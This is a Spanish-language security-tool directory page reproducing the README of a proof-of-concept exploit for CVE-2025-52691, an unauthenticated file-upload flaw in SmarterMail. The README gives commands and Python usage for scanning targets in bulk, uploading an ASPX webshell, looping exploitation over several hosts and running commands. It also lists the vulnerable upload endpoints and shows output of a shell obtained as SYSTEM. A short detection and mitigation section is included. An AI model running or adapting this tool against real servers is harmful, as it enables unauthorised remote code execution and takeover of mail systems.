Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-52691-poc | Kitploit
Herramientas/GitHubGitHub/rimbadirgantara/cve-2025-52691-poc
Escáneres de VulnerabilidadesGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubrimbadirgantara/cve-2025-52691-poc

CVE-2025-52691-poc

Ver Repositorio
3hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-52691 POC

Prueba de concepto para CVE-2025-52691 - RCE por carga arbitraria de archivos no autenticada en SmarterMail

⚠️ Aviso legal

Solo para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado es ilegal.

Resumen

Vulnerabilidad crítica en SmarterMail que permite la carga arbitraria de archivos no autenticada mediante path traversal, lo que conduce a la ejecución remota de código.

Vulnerabilidad: Path traversal en los endpoints de carga permite subir webshells ASPX a la raíz web
Impacto: Ejecución remota de código no autenticada
Vector: Red / No autenticado

Instalación

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-52691-POC.git
cd CVE-2025-52691-POC
pip install requests urllib3

Herramientas

check.py - Escáner de vulnerabilidades

Escanea objetivos en busca de la vulnerabilidad CVE-2025-52691. Guarda solo las URLs vulnerables en el archivo de salida.

root@kitploit:~
# Single target
python check.py https://mail.example.com

# Multiple targets
python check.py -f targets.txt -o results.txt

# Custom timeout
python check.py https://mail.example.com -t 30

Salida: Una URL vulnerable por línea en results.txt

pwn.py - Herramienta de explotación

Sube una webshell ASPX y proporciona ejecución de comandos.

root@kitploit:~
# Basic exploit
python pwn.py https://mail.example.com

# Execute command
python pwn.py https://mail.example.com -c "whoami"

# Interactive shell
python pwn.py https://mail.example.com -i

exploit.py - Biblioteca de Python

Módulo de explotación reutilizable para integrar en scripts personalizados.

Como biblioteca:

root@kitploit:~
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

# Basic usage
config = TargetConfig(base_url="https://mail.example.com")
exploit = SmarterMailExploit(config)

if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))

# With custom timeout
config = TargetConfig(base_url="https://mail.example.com", timeout=60)
exploit = SmarterMailExploit(config)
result = exploit.exploit()

# Execute multiple commands
if result == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))
    print(exploit.execute_command("hostname"))
    print(exploit.execute_command("ipconfig"))

Como script independiente:

root@kitploit:~
# Import and run in Python
python -c "from exploit import *; e=SmarterMailExploit(TargetConfig('https://mail.example.com')); e.exploit()"

# Create custom script
cat << 'EOF' > my_exploit.py
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

targets = ['https://mail1.example.com', 'https://mail2.example.com']
for target in targets:
    config = TargetConfig(base_url=target)
    exploit = SmarterMailExploit(config)
    if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
        print(f"[+] Exploited: {target}")
        print(exploit.execute_command("whoami"))
EOF
python my_exploit.py

Detalles técnicos

Endpoints vulnerables:

root@kitploit:~
/api/upload
/api/v1/upload
/Interface/Frmx/UploadFile.aspx
/MRS/Upload.ashx
/Services/Upload.ashx

Métodos de explotación:

  • Carga de formulario multipart con path traversal (../wwwroot/)
  • POST crudo con cabeceras personalizadas
  • Payload JSON con contenido codificado en base64

Webshell: Shell ASPX mínima que acepta comandos mediante el parámetro ?cmd=

Flujo de ataque

  1. Escanear el objetivo: python check.py <target>
  2. Explotar: python pwn.py <target> -i
  3. Ejecutar comandos en la shell interactiva

Detección y mitigación

Detección:

  • Supervisar las cargas de archivos ASPX en directorios web
  • Revisar los registros en busca de patrones de path traversal (../)
  • Alertar sobre solicitudes inesperadas a /api/upload

Mitigación:

  • Actualizar SmarterMail a la última versión
  • Implementar una validación estricta de rutas de archivos
  • Desplegar un WAF con filtrado de cargas
  • Requerir autenticación en los endpoints de carga

Ejemplo

root@kitploit:~
$ python pwn.py https://mail.example.com -c "whoami"

[*] Target: https://mail.example.com
[+] Target is alive
[*] Shell filename: s4a7b3c2.aspx
[*] Attempting to upload webshell...
[+] SUCCESS! Webshell uploaded
[+] Shell URL: https://mail.example.com/s4a7b3c2.aspx

[*] Executing: whoami
[+] Output:
nt authority\system

Obtenga siempre la autorización adecuada antes de realizar pruebas.

Descargar herramienta